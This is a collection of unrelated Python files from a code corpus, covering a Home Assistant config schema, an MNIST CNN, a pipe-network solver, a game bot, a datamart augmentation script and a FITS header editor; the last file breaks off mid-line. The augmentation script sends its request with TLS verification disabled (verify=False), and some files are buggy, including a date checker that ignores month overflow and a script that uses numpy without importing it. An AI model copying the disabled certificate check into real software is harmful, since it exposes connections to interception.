+{"seq_id":"115900546","text":"\"\"\"Dedicate schema generation.\"\"\"\n\n__all__ = [\n 'BASE_DEVICE_SCHEMA',\n 'BASE_PLATFORM_SCHEMA',\n 'BASE_VALIDATOR_DOMAINS',\n 'USER_INPUT_DEVICE',\n 'USER_INPUT_DEVICE_SCHEMA',\n 'USER_INPUT_ADDITIONAL',\n 'USER_INPUT_ADDITIONAL_SCHEMA',\n 'CONFIG_SCHEMA',\n 'exclusive_auth_methods',\n 'test_for_list_correspondence',\n]\n\nfrom collections import OrderedDict\n\nimport homeassistant.helpers.config_validation as cv\nimport voluptuous as vol\nfrom homeassistant.const import CONF_NAME, CONF_SWITCHES, CONF_SCAN_INTERVAL, CONF_DEVICE_ID, CONF_PROTOCOL, \\\n CONF_HOST, CONF_PORT, CONF_TOKEN, CONF_SENSORS\n\nfrom .const import CONF_CONTROL_KEY, CONF_APPLICATION_ID, DEFAULT_APPLICATION_ID, CONF_CLOUD_HOST, DEFAULT_CLOUD_HOST, \\\n CONF_CLOUD_PORT, DEFAULT_CLOUD_PORT, DEFAULT_SCAN_INTERVAL, DOMAIN, CONF_DEVICES, CONF_USE_MODEL_FROM_PROTOCOL, \\\n DEFAULT_USE_MODEL_FROM_PROTOCOL, CONF_DOMAINS, PROTOCOL_DEFAULT, PROTOCOL_NAME\nfrom .supported_protocols import SUPPORTED_PROTOCOLS\n\n\ndef exclusive_auth_methods(schema: dict):\n host = schema.get(CONF_HOST)\n token = schema.get(CONF_TOKEN)\n if host is None:\n if token is None:\n raise vol.Invalid('Neither method of authentication (local nor cloud) is provided.')\n return schema\n elif token is not None:\n raise vol.Invalid('Both methods of authentication are provided, while only one at once is supported (for now).')\n return schema\n\n\ndef test_for_list_correspondence(config_key: str, protocol_key: str):\n def validator(values):\n param_val = values.get(config_key)\n if param_val is None or isinstance(param_val, bool):\n return values\n avail_val = set(SUPPORTED_PROTOCOLS[values.get(CONF_PROTOCOL)][protocol_key].keys())\n invalid_val = set(param_val) - avail_val\n if invalid_val:\n return vol.Invalid(\n message=config_key.capitalize() + ' types (%s) are invalid',\n path=[config_key]\n )\n return values\n\n return validator\n\nBASE_DEVICE_SCHEMA = {\n vol.Optional(CONF_NAME): cv.string,\n vol.Optional(CONF_SENSORS): vol.Any(bool, vol.All(cv.ensure_list, [cv.string])),\n vol.Optional(CONF_SWITCHES): vol.Any(bool, vol.All(cv.ensure_list, [cv.string])),\n vol.Optional(CONF_SCAN_INTERVAL, default=DEFAULT_SCAN_INTERVAL): cv.time_period,\n}\n\nBASE_VALIDATOR_DOMAINS = [\n test_for_list_correspondence(config_key, protocol_key)\n for config_key, (entity_domain, protocol_key) in CONF_DOMAINS.items()\n]\n\nBASE_PLATFORM_SCHEMA = {\n **BASE_DEVICE_SCHEMA,\n\n # Required keys on direct control\n vol.Required(CONF_DEVICE_ID): cv.string,\n vol.Optional(CONF_CONTROL_KEY): cv.string,\n vol.Required(CONF_PROTOCOL): vol.In(SUPPORTED_PROTOCOLS.keys()),\n\n # Optional attributes\n vol.Optional(CONF_APPLICATION_ID, default=DEFAULT_APPLICATION_ID): cv.string,\n\n # Local authentication\n vol.Optional(CONF_HOST): cv.string,\n vol.Optional(CONF_PORT): cv.positive_int,\n\n # Cloud authentication\n vol.Optional(CONF_TOKEN): cv.string,\n vol.Optional(CONF_CLOUD_HOST, default=DEFAULT_CLOUD_HOST): cv.string,\n vol.Optional(CONF_CLOUD_PORT, default=DEFAULT_CLOUD_PORT): cv.positive_int,\n}\n\nDEVICE_SCHEMA = vol.All(BASE_PLATFORM_SCHEMA, exclusive_auth_methods, *BASE_VALIDATOR_DOMAINS)\n\nUSER_INPUT_DEVICE = OrderedDict()\nUSER_INPUT_DEVICE[vol.Required(CONF_NAME)] = str\nUSER_INPUT_DEVICE[vol.Required(CONF_DEVICE_ID)] = str\nUSER_INPUT_DEVICE[vol.Required(CONF_CONTROL_KEY)] = str\nUSER_INPUT_DEVICE[vol.Required(CONF_HOST)] = str\nUSER_INPUT_DEVICE[vol.Required(CONF_PROTOCOL)] = vol.In({\n p_id: p_def.get(PROTOCOL_NAME, p_id)\n for p_id, p_def 
in SUPPORTED_PROTOCOLS.items()\n})\nUSER_INPUT_DEVICE[vol.Optional(CONF_PORT)] = str\nUSER_INPUT_DEVICE[vol.Optional(CONF_SCAN_INTERVAL, default=DEFAULT_SCAN_INTERVAL.seconds)] = int\n\nUSER_INPUT_DEVICE_SCHEMA = vol.Schema(USER_INPUT_DEVICE)\n\nUSER_INPUT_ADDITIONAL = lambda protocol_id, protocol_key: {\n vol.Optional(protocol_id + '_' + ent_type, default=ent_config.get(PROTOCOL_DEFAULT)): bool\n for ent_type, ent_config in SUPPORTED_PROTOCOLS[protocol_id][protocol_key].items()\n}\nUSER_INPUT_ADDITIONAL_SCHEMA = lambda *args, **kwargs: vol.Schema(USER_INPUT_ADDITIONAL(*args, **kwargs))\n\n# ACCOUNT_SCHEMA = {\n# vol.Optional(CONF_NAME, default=DEFAULT_NAME_ACCOUNT): cv.string,\n# vol.Required(CONF_TOKEN): cv.string,\n# vol.Optional(CONF_APPLICATION_ID, default=DEFAULT_APPLICATION_ID): cv.string,\n# vol.Optional(CONF_CUSTOMIZE): vol.Any(False, {cv.string: BASE_DEVICE_SCHEMA})\n# }\n\nCONFIG_SCHEMA = vol.Schema({\n DOMAIN: {\n vol.Optional(CONF_USE_MODEL_FROM_PROTOCOL, default=DEFAULT_USE_MODEL_FROM_PROTOCOL): cv.boolean,\n vol.Optional(CONF_DEVICES): vol.All(cv.ensure_list, [DEVICE_SCHEMA]),\n # vol.Optional(CONF_ACCOUNTS): vol.All(cv.ensure_list, [ACCOUNT_SCHEMA])\n }\n}, extra=vol.ALLOW_EXTRA)\n","sub_path":"custom_components/hekr/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
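A side note on the raise in test_for_list_correspondence: voluptuous validators signal failure by raising Invalid, while returning an Invalid instance (as the original code did) silently makes the exception object the validated value. A minimal standalone illustration of the contract:

    import voluptuous as vol

    def require_even(value):
        if value % 2:
            raise vol.Invalid('value must be even')  # raising is what aborts validation
        return value

    schema = vol.Schema(vol.All(int, require_even))
    print(schema(4))   # 4
    try:
        schema(3)
    except vol.Invalid as err:
        print(err)     # value must be even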
+{"seq_id":"607525586","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.utils.data as Data\nimport torchvision\nimport matplotlib.pyplot as plt\n\nEPOCH = 1 #数据集训练几遍\nBATCH_SIZE = 50 #一批数据的个数\nLR = 0.001\nDOWNLOAD_MNIST = False\n\n#加载数据集\ntrain_data = torchvision.datasets.MNIST(\n root='./mnist',\n train=True,\n transform=torchvision.transforms.ToTensor(), #(0,1)\n download=DOWNLOAD_MNIST\n)\n\n#生成训练器\ntrain_loader = Data.DataLoader(dataset=train_data,batch_size=BATCH_SIZE,shuffle=True,num_workers=2)\n#加载测试集\ntest_data = torchvision.datasets.MNIST(root='./mnist/',train=False)\n\n#!!!cuda change here!!!\ntest_x=Variable(torch.unsqueeze(test_data.test_data,dim=1),volatile=True).type(torch.FloatTensor)[:2000].cuda()/255 #每个像素点的原值是0-255之间\ntest_y=test_data.test_labels[:2000].cuda()\n\nclass CNN(nn.Module):\n def __init__(self):\n super(CNN,self).__init__()\n #一般来说一个大卷积层包括卷积层,激活函数和池化层\n self.conv1=nn.Sequential(\n nn.Conv2d(\n in_channels=1, #表示原始图片有多少层,也就是有多少不同种类的特征值,如RGB图片,有红,绿,蓝三个值\n out_channels=16,#表示输出多少个不同种类的特征值;也就是对同一个图片块,有16个过滤器同时工作\n kernel_size=5, #一个过滤器的长和宽都是五个像素点\n stride=1, #相邻两次扫描的图片块之间相隔几个像素点\n padding=2, #在图片周围多出2圈0值,防止过滤器的某一边超过图片边界,如何计算:if stride=1,padding=(kernel_size-1)/2,���证提取出的新图片长宽和原图一样\n ),\n nn.ReLU(),\n #池化层向下筛选需要的部分\n nn.MaxPool2d(\n kernel_size=2, #使用一个长宽为2的池化过滤器\n ),\n )\n self.conv2=nn.Sequential(\n nn.Conv2d(16,32,5,1,2), #输入的图片有16层,输出图片有32层\n nn.ReLU(),\n nn.MaxPool2d(2),\n )\n self.out=nn.Linear(32*7*7,10) #输入的高度是32,长宽为7,因为经过两次池化;输出为10个不同的值,即0-9\n\n def forward(self, x):\n x=self.conv1(x)\n x=self.conv2(x) #x中的数据有四个维度:(batch,32,7,7)\n x=x.view(x.size(0),-1) #保留batch,数据变为二维:(batch,32*7*7);因为输出层只接受一维数据作为输入\n output=self.out(x)\n return output\n\ncnn = CNN()\n\n#!!!cuda change here!!!\ncnn.cuda()\n\n#训练过程\noptimizer=torch.optim.Adam(cnn.parameters(),lr=LR)\nloss_func=nn.CrossEntropyLoss() #选择误差函数\n\nif __name__ == '__main__':\n for epoch in range(EPOCH):\n for step,(x,y) in enumerate(train_loader):\n\n #!!!cuda在此做了改变!!!\n b_x=Variable(x).cuda()\n b_y=Variable(y).cuda()\n\n output=cnn(b_x)\n loss=loss_func(output,b_y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if step%50 == 0:\n test_output=cnn(test_x)\n\n #!!! cuda change here!!!\n pred_y=torch.max(test_output,1)[1].cuda().data\n accuracy = torch.sum(pred_y == test_y).type(torch.FloatTensor) / test_y.size(0)\n print('Epoch: ', epoch, '| train loss: %.4f' % loss.item(), '| test accuracy: %.2f' % accuracy)\n","sub_path":"src/CnnCuda.py","file_name":"CnnCuda.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"639896092","text":"from scipy.optimize import fsolve\r\nimport numpy as np\r\n\r\nfrom PipeClass import Pipe\r\nfrom PumpClass import Pump\r\n\r\n# Solve the pipe network when the supply is a pressure source\r\ndef p1errors(pvals, pipelist, rho, mu, supplyp): # using a pressure source\r\n pressureB, pressureC, pressureD = pvals #Expand pressures\r\n ab, bc, cd, bd, de = pipelist #Expand pipes\r\n\r\n '''\r\n Use the image of the pipe network to derive equations for flow rate at all the nodes\r\n '''\r\n Qab = ab.flow(pressureB - supplyp, rho, mu)\r\n Qbc = bc.flow(pressureC - pressureB, rho, mu)\r\n Qcd = cd.flow(pressureD - pressureC, rho, mu)\r\n Qde = de.flow(0 - pressureD, rho, mu)\r\n Qbd = bd.flow(pressureD - pressureB, rho, mu)\r\n\r\n return [Qab - Qbc - Qbd, #Sum of the flows at node B\r\n Qbc - Qcd, #Sum of the flows at node C\r\n Qcd + Qbd - Qde] #Sum of the flows at Node D\r\n\r\n# Solve the pipe network when the supply is a flow source\r\ndef p2errors(pvals, pipelist,rho,mu,supplyQ): # using a pressure source\r\n pressureA, pressureB, pressureC, pressureD = pvals #Expand pressures\r\n ab, bc, cd, bd, de = pipelist #Expand pipes\r\n\r\n '''\r\n Use the image of the pipe network to derive equations for flow rate at all the nodes\r\n '''\r\n Qab = ab.flow(pressureB - pressureA, rho, mu)\r\n Qbc = bc.flow(pressureC - pressureB, rho, mu)\r\n Qcd = cd.flow(pressureD - pressureC, rho, mu)\r\n Qde = de.flow(0 - pressureD, rho, mu)\r\n Qbd = bd.flow(pressureD - pressureB, rho, mu)\r\n\r\n return [supplyQ - Qab, #Sum of the flows at node A\r\n Qab - Qbc - Qbd, #Sum of the flows at node B\r\n Qbc - Qcd, #Sum of the flows at node C\r\n Qcd + Qbd - Qde] #Sum of the flows at Node D\r\n\r\n# Solve the pipe network when the supply is a pump\r\ndef p3errors(pvals, pipelist, rho, mu, pump): # using a pump\r\n pressureA, pressureB, pressureC, pressureD = pvals #Expand pressures\r\n ab, bc, cd, bd, de = pipelist #Expand pipes\r\n\r\n '''\r\n Use the image of the pipe network to derive equations for flow rate at all the nodes\r\n '''\r\n Qab = ab.flow(pressureB - pressureA, rho, mu)\r\n Qbc = bc.flow(pressureC - pressureB, rho, mu)\r\n Qcd = cd.flow(pressureD - pressureC, rho, mu)\r\n Qde = de.flow(0 - pressureD, rho, mu)\r\n Qbd = bd.flow(pressureD - pressureB, rho, mu)\r\n\r\n return [pump.flow(pressureA) - Qab, #Sum of the flows at node A\r\n Qab - Qbc - Qbd, #Sum of the flows at node B\r\n Qbc - Qcd, #Sum of the flows at node C\r\n Qcd + Qbd - Qde] #Sum of the flows at Node D\r\n\r\ndef main():\r\n rho = 1.94\r\n mu = 0.0000186\r\n eps = 0.00082\r\n\r\n ab = Pipe(4/12, 2500, eps, 'ab')\r\n bc = Pipe(5/12, 3500, eps, 'bc')\r\n cd = Pipe(6/12, 6000, eps, 'cd')\r\n bd = Pipe(8/12, 2000, eps, 'bd')\r\n de = Pipe(8/12, 1500, eps, 'de')\r\n\r\n pipelist = [ab,bc,cd,bd,de]\r\n\r\n #Pressure Source\r\n guess = [1000,1100,1200]\r\n supplyp = 7596.4 #psf or 100 psi\r\n Pvals = fsolve(p1errors, guess, args = (pipelist, rho, mu, supplyp))\r\n\r\n Pvals = fsolve(p1errors, Pvals, args = (pipelist, rho, mu, supplyp))\r\n pb, pc, pd = Pvals\r\n\r\n print('\\nPressures at b, c and d are {:.1f}, {:.1f} and {:.1f}'.format(pb, pc, pd))\r\n\r\n for pipe in pipelist: pipe.display()\r\n\r\n print('Fsolve Errors: ', p1errors(Pvals, pipelist, rho, mu, supplyp))\r\n\r\n #Flow Source\r\n guess = [10000, 1000, 1100, 1200]\r\n supplyQ = 0.54932 #cfm\r\n Pvals = fsolve(p2errors, guess, args=(pipelist, rho, mu, supplyQ))\r\n pa, pb, pc, pd = Pvals\r\n\r\n print('\\nPressures at a, b, c and d are {:.1f}, {:.1f}, 
{:.1f} and {:.1f}'.format(pa, pb, pc, pd))\r\n for pipe in pipelist: pipe.display()\r\n print('Fsolve Errors: ', p2errors(Pvals, pipelist, rho, mu, supplyQ))\r\n\r\n #Pump Source\r\n pump = Pump([15000, -1820, -12900, -15150]) #create the pump object\r\n\r\n guess = [130, 120, 110, 100]\r\n Pvals = fsolve(p3errors, guess, args=(pipelist, rho, mu, pump))\r\n pa, pb, pc, pd = Pvals\r\n\r\n print('\\nPressures at a, b, c and d are {:.1f}, {:.1f}, {:.1f} and {:.1f}'.format(pa, pb, pc, pd))\r\n for pipe in pipelist: pipe.display()\r\n print('Pump flow and pressure are: {:.3f} and {:.3f}'.format(pump.Q, pump.dp))\r\n print('Fsolve Errors: ', p3errors(Pvals, pipelist, rho, mu, pump))\r\n\r\nmain()\r\n","sub_path":"HW6/PipeNetwork.py","file_name":"PipeNetwork.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
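All three error functions above follow one pattern: express each flow through the pipe law, then return the mass-balance residual at every node for fsolve to drive to zero. The same pattern on a toy network with an assumed Q = C*sqrt(dp) pipe law (the record's Pipe class models real pipe friction, so this is only a sketch):

    import numpy as np
    from scipy.optimize import fsolve

    def q(c, p_hi, p_lo):
        # toy pipe law: flow grows with the square root of the pressure drop
        return c * np.sqrt(max(p_hi - p_lo, 0.0))

    def errors(pvals, supply_p):
        (pb,) = pvals
        q_in = q(2.0, supply_p, pb)                 # supply -> node B
        q_out = q(1.0, pb, 0.0) + q(1.5, pb, 0.0)   # two parallel pipes B -> outlet
        return [q_in - q_out]                       # flow balance at node B

    (pb,) = fsolve(errors, [50.0], args=(100.0,))
    print(round(pb, 2))  # about 39.02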
+{"seq_id":"300007417","text":"def Check(year, month, day):\n if (( year >= 1500 and year <= 2020) and\n (month >= 1 and month <= 12) and\n (day >= 1 and day <= 31)):\n \n print(day+1,month, year,sep='-')\n\n\nCheck(2020,10,22)\nCheck(22, 12,22)\n","sub_path":"2 Python Programming Examples on Mathematical Expressions/1 Check Date if valid print incremented Date.py","file_name":"1 Check Date if valid print incremented Date.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"298614264","text":"\"\"\"\nThis bot always attacks as soon as it has a weaker target. Internal sites move towards their\nstrongest neighbour.\n\"\"\"\n\nimport logging\n\nfrom hlt.core import Location, Move\nfrom hlt.messaging import get_init, send_init, get_frame, send_frame\n\nNAME = 'GreedyBot'\n\nlogging.basicConfig(filename='logs/{}.log'.format(NAME.lower()), level=logging.INFO)\nlogger = logging.getLogger(name=NAME)\n\nmyID, gameMap = get_init()\nsend_init(NAME)\n\nwhile True:\n moves = []\n game_map = get_frame()\n\n # Iterate over locations in map.\n for i, row in enumerate(game_map.map):\n for j, site in enumerate(row):\n # If we own this square, make a decision.\n if site[2] == myID:\n # Create a Location object.\n location = Location(row=i, col=j)\n\n # Look at the immediate surroundings.\n friends, neutrals, enemies = game_map.get_neighbours(myID, i, j)\n\n # Check if this is an edge piece.\n if enemies or neutrals:\n # Treat enemies and neutrals same for now.\n enemies.update(neutrals)\n\n # Choose the weakest neighbour.\n weakest_dir = min(enemies, key=lambda x: enemies[x][0])\n\n if enemies[weakest_dir][0] < site[0]:\n # Make a move.\n moves.append(Move(loc=location,\n direction=weakest_dir))\n\n elif site[0] != 0:\n # Choose the strongest friendly neighbour\n strongest_dir = max(friends, key=lambda x: friends[x][0])\n\n # Make a move.\n moves.append(Move(loc=location,\n direction=strongest_dir))\n\n # Send moves to the game.\n send_frame(moves)\n","sub_path":"bots/greedy_bot.py","file_name":"greedy_bot.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"86923415","text":"\"\"\"\nReference:\n - https://vida-nyu.gitlab.io/-/datamart/datamart-api/-/jobs/233008593/artifacts/pages/rest_api.html\n\n- https://datamart.d3m.vida-nyu.org\n\"\"\"\nimport json\nfrom io import BytesIO\nfrom collections import Counter\nimport zipfile\nimport random\nimport requests\nimport json\nimport os\nfrom os.path import abspath, dirname, isdir, isfile, join\n\nCURRENT_DIR = dirname(abspath(__file__))\nINPUT_DIR = join(CURRENT_DIR, 'input')\nOUTPUT_DIR = join(CURRENT_DIR, 'output')\n\n\nurl = 'https://auctus.vida-nyu.org'\n\nsearch_results_fpath = 'output/search_result_example2.json'\n\n\ndef dashes(): print('-' * 40)\ndef msgt(m): dashes(); print(m); dashes()\n\ndef run_checks():\n \"\"\"run some checks\"\"\"\n assert isfile(test_file_to_augment), \\\n 'test file not found: %s' % test_file_to_augment\n\n game_ids = []\n for line in open(test_file_to_augment, 'r').readlines()[1:]:\n items = line.split(',')\n game_ids.append(items[0])\n\n print(len(game_ids))\n\n c = Counter(game_ids)\n print(c.most_common(5))\n\n outlines = ['Medallion_Number,Earnings']\n for val, cnt in c.most_common(20):\n earnings = random.randint(5000, 7500)\n info_line = f'{val},{earnings}'\n outlines.append(info_line)\n #print(info_line)\n\n print('\\n'.join(outlines))\n\ndef run_augment_test():\n \"\"\"Download POST\"\"\"\n\n # Query result\n #\n result_content = open(join(INPUT_DIR, 'nyu_result_aug_01_water.json'), 'r').read()\n\n task_data = json.loads(result_content)\n\n \"\"\"\n \"left_columns\": \"[[1]]\",\n \"right_columns\": \"[[13]]\",\n \"augment_with_dataset\": true,\n \"augment_with_join_pairs\": false,\n \"exact_match\": true\n \"\"\"\n task_data['augmentation'] = {\\\n 'type': 'join',\n 'left_columns': [[1]], #[(1,)], # game id user's dataset\n 'right_columns': [[13]], #[(0,)] # game id in datamart dataset\n }\n\n # syntax check\n #\n #assert json.loads(task_data), 'task_data not valid json'\n\n # Augment url\n #\n augment_url = 'https://auctus.vida-nyu.org/augment'\n\n print('task_data', task_data)\n print('-' * 40)\n print('augment_url', augment_url)\n print('-' * 40)\n\n # TAXI Dataset\n test_file_to_augment = join(INPUT_DIR,\n 'seed_taxi_data.csv',)\n\n data_params = dict(data=open(test_file_to_augment, 'rb'),\n task=json.dumps(task_data),\n )\n\n # Make request\n #\n try:\n response = requests.post(augment_url,\n files=data_params,\n verify=False,\n allow_redirects=True,\n stream=True)\n\n except requests.exceptions.Timeout as err_obj:\n user_msg = ('Request timed out. responded with: %s' % err_obj)\n print(user_msg)\n return\n\n if response.status_code != 200:\n user_msg = (f'Augment failed. Status code:'\n f' {response.status_code}. response: {response.text}')\n print(user_msg)\n return\n\n print('augment success!')\n\n\n data_foldername = join(OUTPUT_DIR, 'augment-results-fifa',)\n if not isdir(data_foldername):\n os.makedirs(data_foldername)\n\n try:\n with zipfile.ZipFile(BytesIO(response.content), 'r') as data_zip:\n data_zip.extractall(data_foldername)\n except RuntimeError as err_obj:\n user_msg = (f'Failed to extract zip to \"{data_foldername}\".'\n f' Error: %s') % (err_obj,)\n print(user_msg)\n\n msgt('files downloaded to %s' % data_foldername)\n\n\nif __name__ == '__main__':\n # run_search()\n # run_checks()\n run_augment_test()\n","sub_path":"dev_scripts/run_augment_test1.py","file_name":"run_augment_test1.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"154537917","text":"from astropy.io import fits \nimport astropy.units as u\nimport time\n\n# get header and data\ncase_name = 'drift' #all_effects_2048 #scao_only_2048\ncontrast = 'ADI'\nmode = 'RAVC'\nif contrast.upper() == 'ADI':\n contrast = contrast.upper()\nelif contrast.lower() == 'raw':\n contrast = contrast.lower()\nscao = 'compass3600s_samp300ms' #'compass600s_samp100ms' #'compass3600s_samp300ms'\nband = 'M'\n#band_bckg = '%s_bckg0'%band\nband_bckg = '%s_bckg0'%band\n#band_bckg = 'L_bckg1'\nfilename = 'cc_%s_dec-2.47_%s_%s_%s_%s.fits'%(scao, band_bckg, mode, case_name, contrast)\n\nprint(filename)\nfits.open(filename)[0].header\nhdu = fits.open(filename)[0]\nhdr = hdu.header\ndata = hdu.data\n\n# define new header elements\n# hdr['bckg'] = False#True\n# hdr['mag'] = None #if bckg is True else None\n# hdr['date'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n# hdr['title'] = 'SCAO residuals only (1h, 300ms)'\n# hdr['mode'] = 'CVC'\n# hdr['band'] = 'N2a'#'N1a'#'N2'#'N1'#'M'#'L'\nhdr['lam'] = 3.8128e-06#4.8091E-06#8.6016E-06#1.1236E-05#8.6469E-06#1.1187E-05 #1024 values\n#hdr['lam'] = 1.1219E-05#3.8204e-06#4.7970E-06#8.6313E-06#1.1287E-05#8.6658E-06# #2048 values\n# hdr['diam'] = 37\n\n# change header\nif contrast == 'ADI':\n hdr['ylabel'] = '5-$\\sigma$ sensitivity (contrast)'\nelif contrast == 'raw':\n hdr['ylabel'] = 'Raw contrast'\nhdr['xlabel'] ='Angular separation $[\\lambda/D]$'\nhdr2 = fits.Header({'xlabel':hdr['xlabel'], 'ylabel':hdr['ylabel'], \\\n 'title':hdr['title']})\nhdr2['date'] = (hdr['date'], 'created')\nhdr2['contrast'] = (contrast, 'contrast type: ADI, PCA, raw,...')\nhdr2['mode'] = (mode, 'HCI mode')\nhdr2['band'] = (hdr['band'], 'spectral band')\nhdr2['lam'] = (hdr['lam'], 'wavelength in m')\nhdr2['diam'] = (hdr['diam'], 'pupil diameter in m')\nhdr2['bckg'] = (hdr['bckg'], 'shot noise (bool)')\nhdr2['mag'] = (hdr['mag'], 'star magnitude (if bckg is True else None)')\n\n#hdr2['title'] = 'static NCPA at HSF (>10c/p)'\n#hdr2['title'] = 'quasi-static NCPA (0-0.01Hz) at HSF (>10c/p)'\n#hdr2['title'] = 'quasi-static NCPA (0-0.01Hz) at LSF (<10c/p)'\n#hdr2['title'] = 'quasi-static petal piston (0-0.01Hz) at HSF (<10c/p)'\n#hdr2['title'] = 'quasi-static NCPA (10c/p)'\n#hdr2['title'] = 'quasi-static NCPA (10cpp) + LTF (<0.01Hz, 10nm rms)'\n#hdr2['LABEL4'] = 'LSF (<10cpp) + HTF (>0.01Hz, 10nm rms)'\n#hdr2['LABEL5'] = 'HSF (>10cpp) + HTF (>0.01Hz, 10nm rms)'\n\n\n#hdr2['LABEL1'] = '0 nm rms'\n#hdr2['LABEL2'] = '200 nm rms'\n#hdr2['LABEL3'] = '125 nm rms'\n#hdr2['LABEL4'] = '150 nm rms'\n#hdr2['LABEL5'] = '175 nm rms'\n#hdr2['LABEL6'] = '200 nm rms'\n#hdr2['LABEL7'] = '225 nm rms'\n#hdr2['LABEL8'] = '250 nm rms'\n\n#hdr2['LABEL2'] = 'static NCPA at HSF, 35.9 nm rms'\n#hdr2['LABEL3'] = 'quasi-static NCPA at LSF, 20 nm rms'\n#hdr2['LABEL4'] = 'quasi-static NCPA at HSF, 20 nm rms'\n#hdr2['LABEL5'] = 'dynamic NCPA at all SF, 40 nm rms'\n#hdr2['LABEL6'] = 'all NCPA effects combined'\n\n# hdr2['LABEL2'] = 'pointing jitter 2 mas rms'\n# hdr2['LABEL3'] = 'pointing quasistatics 0.4 mas rms'\n# hdr2['LABEL4'] = 'pupil drift (RAVC) 2% ptv'\n# hdr2['LABEL5'] = 'NCPA + petal piston (see box)'\n# hdr2['LABEL6'] = 'ALL EFFECTS'\n# hdr2['LABEL7'] = 'ALL EFFECTS + 7 misaligned segments'\n\n## edit data\ndata2 = data[0:1,:]\n#data2 = np.vstack((data2, data[-2,:]))\n\n#cube0 = fits.getdata('cc_compass3600s_samp300ms_dec-2.47_L6_bckg0_RAVC_SCAOonly_raw.fits')\n#cube1 = fits.getdata('cc_raw_L_RAVC_misaligned_segments_7_flower.fits')\n#cube2 = 
fits.getdata('cc_raw_L_RAVC_pointing_jitter_0.01-1Hz_2.fits')\n#cube3 = fits.getdata('cc_raw_L_RAVC_pointing_quasistatics_0-0.01Hz_0.4.fits')\n#cube4 = fits.getdata('cc_raw_L_RAVC_pupil_drift_RAVC_2.fits')\n##cube5 = fits.getdata('cc_raw_L_RAVC_ncpa+petal_piston_20.fits')\n#cube5 = fits.getdata('cc_raw_L_RAVC_petal_piston_drift_10.fits')\n##cube6 = fits.getdata('cc_raw_L_RAVC_ncpa_lin_drift_ptv_20.fits')\n#cube6 = fits.getdata('cc_raw_L_RAVC_all_ncpa_20191011.fits')\n#cube7 = fits.getdata('cc_raw_L_RAVC_ALL_EFFECTS_20191017.fits')\n\n#cube0 = fits.getdata('cc_compass3600s_samp300ms_dec-2.47_L6_bckg0_RAVC_SCAOonly_ADI.fits')\n#cube1 = fits.getdata('cc_compass1h_samp300ms_dec-2.47_L_mag6_bckg0_RAVC_all_effects_2.fits')\n#cube2 = fits.getdata('cc_compass3600s_samp300ms_ADI3600s_samp300ms_avg0ms_dec-2.47deg_L_mag6_bckg0_RAVC_71.fits')\n#cube3 = fits.getdata('cc_compass3600s_samp300ms_dec-2.47_L6_bckg0_RAVC_pointing_quasistatics_0-0.01Hz_ADI.fits')\n#cube4 = fits.getdata('cc_compass1h_samp300ms_dec-2.47_L_mag6_bckg0_RAVC_all_effects_5.fits')\n##cube5 = fits.getdata('cc_raw_L_RAVC_ncpa+petal_piston_20.fits')\n#cube5 = fits.getdata('cc_compass1h_samp300ms_dec-2.47_L_mag6_bckg0_RAVC_all_effects_6.fits')\n##cube6 = fits.getdata('cc_raw_L_RAVC_ncpa_lin_drift_ptv_20.fits')\n#cube6 = fits.getdata('cc_compass3600s_samp300ms_dec-2.47_L6_bckg0_RAVC_20191011_ADI.fits')\n#cube7 = fits.getdata('cc_compass3600s_samp300ms_ADI3600s_samp300ms_avg0ms_dec-2.47deg_L_mag6_bckg0_RAVC_78.fits')\n\nif contrast == 'ADI':\n update_x = True\n# for i in np.arange(3.5,-2,-.5):\n# cube = fits.getdata('cc_%s_dec-2.47_%smag%s_bckg1_CVC_%s.fits'%(scao,band,round(i,1),case_name)).T\n for i in np.arange(1,4,1):\n cube = fits.getdata('cc_%s_dec-2.47_%smag6_bckg0_RAVC_%s_%s.fits'%(scao,band,case_name,i)).T\n # X-axis in lam/D\n if update_x is True:\n lamD2asec = hdr['lam']/hdr['diam']*u.rad.to('arcsec') # lam/D to arcsec\n data2 = cube[4,:]/lamD2asec\n update_x = False\n data2 = np.vstack((data2, cube[1,:]))\n # cube0 = fits.getdata('cc_%s_ADI3600s_samp300ms_avg0ms_dec-2.47deg_%s_mag3.5_bckg1_CVC_cvc_%s.fits'%(scao,band,case_name)).T\n # cube1 = fits.getdata('cc_%s_ADI3600s_samp300ms_avg0ms_dec-2.47deg_%s_mag3_bckg1_CVC_cvc_%s.fits'%(scao,band,case_name)).T\n # cube2 = fits.getdata('cc_%s_ADI3600s_samp300ms_avg0ms_dec-2.47deg_%s_mag2.5_bckg1_CVC_cvc_%s.fits'%(scao,band,case_name)).T\n pass\nelif contrast == 'raw':\n cube = fits.getdata('cc_raw_L_RAVC_SCAO_ONLY_0.fits')\n cube0 = fits.getdata('cc_raw_L_RAVC_ncpa+petal_piston_20191205.fits')\n cube1 = fits.getdata('cc_raw_L_RAVC_ALL_EFFECTS_20191205.fits')\n cube2 = fits.getdata('cc_raw_L_RAVC_ALL_EFFECTS+MIS_SEG_20191205.fits')\n cube3 = fits.getdata('cc_raw_L_RAVC_pointing_quasistatics_0-0.01Hz_0.4.fits')\n cube4 = fits.getdata('cc_raw_L_RAVC_pointing_jitter_0.01-1Hz_2.fits')\n cube5 = fits.getdata('cc_raw_L_RAVC_pupil_drift_RAVC_2.fits')\n pass\n\n\n\nif False:\n data2 = np.vstack((data2, cube0[1,:]))\n data2 = np.vstack((data2, cube1[1,:]))\n data2 = np.vstack((data2, cube2[1,:]))\n data2 = np.vstack((data2, cube3[1,:]))\n data2 = np.vstack((data2, cube4[1,:]))\n data2 = np.vstack((data2, cube5[1,:]))\n data2 = np.vstack((data2, cube6[1,:]))\n data2 = 